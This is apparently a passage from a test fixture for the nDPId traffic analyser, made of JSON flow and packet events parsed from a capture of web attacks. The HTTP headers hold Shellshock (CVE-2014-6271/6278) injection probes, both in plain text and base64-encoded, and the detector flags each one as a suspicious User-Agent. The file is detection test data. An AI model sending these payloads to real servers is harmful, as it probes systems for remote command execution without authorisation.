{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277419,"flow_last_seen":1576420277419,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277419,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50488,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":1,"flow_last_seen":1576420277419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277419,"pkt":"AAAAAAAAAAAAAAAACABFAAEJrmtAAEAGjYF\/AAABfwAAAcU4H5CXuZakZnwUBoAYAED+\/QAAAQEICp1m\/dOdZv3TR0VUIC9pbmRleC5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"} +01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277419,"flow_last_seen":1576420277419,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277419,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50488,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277420,"flow_last_seen":1576420277420,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277420,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50490,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_packet_id":1,"flow_last_seen":1576420277420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277420,"pkt":"AAAAAAAAAAAAAAAACABFAAEJZRVAAEAG1td\/AAABfwAAAcU6H5C6AV3ZPf\/xToAYAED+\/QAAAQEICp1m\/dSdZv3UR0VUIC9pbmZvLmNnaSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277420,"flow_last_seen":1576420277420,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277420,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50490,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/info.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277422,"flow_last_seen":1576420277422,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277422,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50492,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_packet_id":1,"flow_last_seen":1576420277422,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277422,"pkt":"AAAAAAAAAAAAAAAACABFAAEI0gtAAEAGaeJ\/AAABfwAAAcU8H5DcN+rDzEDc2oAYAED+\/AAAAQEICp1m\/dadZv3WR0VUIC9pbmZvLnNoIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} +01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277422,"flow_last_seen":1576420277422,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277422,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50492,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/info.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277423,"flow_last_seen":1576420277423,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277423,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50494,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_packet_id":1,"flow_last_seen":1576420277423,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277423,"pkt":"AAAAAAAAAAAAAAAACABFAAENVqhAAEAG5UB\/AAABfwAAAcU+H5CeOW5utt+cAoAYAED\/AQAAAQEICp1m\/dedZv3XR0VUIC9sb2FkcGFnZS5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277423,"flow_last_seen":1576420277423,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277423,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50494,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/loadpage.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277425,"flow_last_seen":1576420277425,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277425,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50496,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_packet_id":1,"flow_last_seen":1576420277425,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277425,"pkt":"AAAAAAAAAAAAAAAACABFAAEKJkVAAEAGFad\/AAABfwAAAcVAH5DPeB6QOQhEGoAYAED+\/gAAAQEICp1m\/didZv3YR0VUIC9sb2dpbi5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277425,"flow_last_seen":1576420277425,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277425,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50496,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277426,"flow_last_seen":1576420277426,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277426,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50498,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":1,"flow_last_seen":1576420277426,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277426,"pkt":"AAAAAAAAAAAAAAAACABFAAEKG0lAAEAGIKN\/AAABfwAAAcVCH5Dr2SOM+8VpkIAYAED+\/gAAAQEICp1m\/dqdZv3aR0VUIC9sb2dpbi5waHAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} +01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277426,"flow_last_seen":1576420277426,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277426,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50498,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277428,"flow_last_seen":1576420277428,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277428,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50500,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00765{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_packet_id":1,"flow_last_seen":1576420277428,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277428,"pkt":"AAAAAAAAAAAAAAAACABFAAEJsHVAAEAGi3d\/AAABfwAAAcVEH5DgV4i\/xF\/y64AYAED+\/QAAAQEICp1m\/dydZv3cR0VUIC9sb2dpbi5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"} +01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277428,"flow_last_seen":1576420277428,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277428,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50500,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277429,"flow_last_seen":1576420277429,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277429,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50502,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_packet_id":1,"flow_last_seen":1576420277429,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277429,"pkt":"AAAAAAAAAAAAAAAACABFAAEMTIBAAEAG72l\/AAABfwAAAcVGH5AiwXS0u+SpZoAYAED\/AAAAAQEICp1m\/d2dZv3dR0VUIC9wYXRodGVzdC5wbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} +01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277429,"flow_last_seen":1576420277429,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277429,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50502,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pathtest.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277431,"flow_last_seen":1576420277431,"flow_idle_time":7560000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":208,"midstream":1,"thread_ts_msec":1576420277431,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50504,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_packet_id":1,"flow_last_seen":1576420277431,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1576420277431,"pkt":"AAAAAAAAAAAAAAAACABFAAEE5XFAAEAGVoB\/AAABfwAAAcVIH5CqQt2jzObFZYAYAED++AAAAQEICp1m\/d+dZv3eR0VUIC9waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277431,"flow_last_seen":1576420277431,"flow_idle_time":7560000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":208,"midstream":1,"thread_ts_msec":1576420277431,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50504,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277432,"flow_last_seen":1576420277432,"flow_idle_time":7560000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277432,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50506,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_packet_id":1,"flow_last_seen":1576420277432,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277432,"pkt":"AAAAAAAAAAAAAAAACABFAAEFeJtAAEAGw1V\/AAABfwAAAcVKH5AUwUBY1pIiyIAYAED++QAAAQEICp1m\/eCdZv3gR0VUIC9waHA0IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} +01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277432,"flow_last_seen":1576420277432,"flow_idle_time":7560000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277432,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50506,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 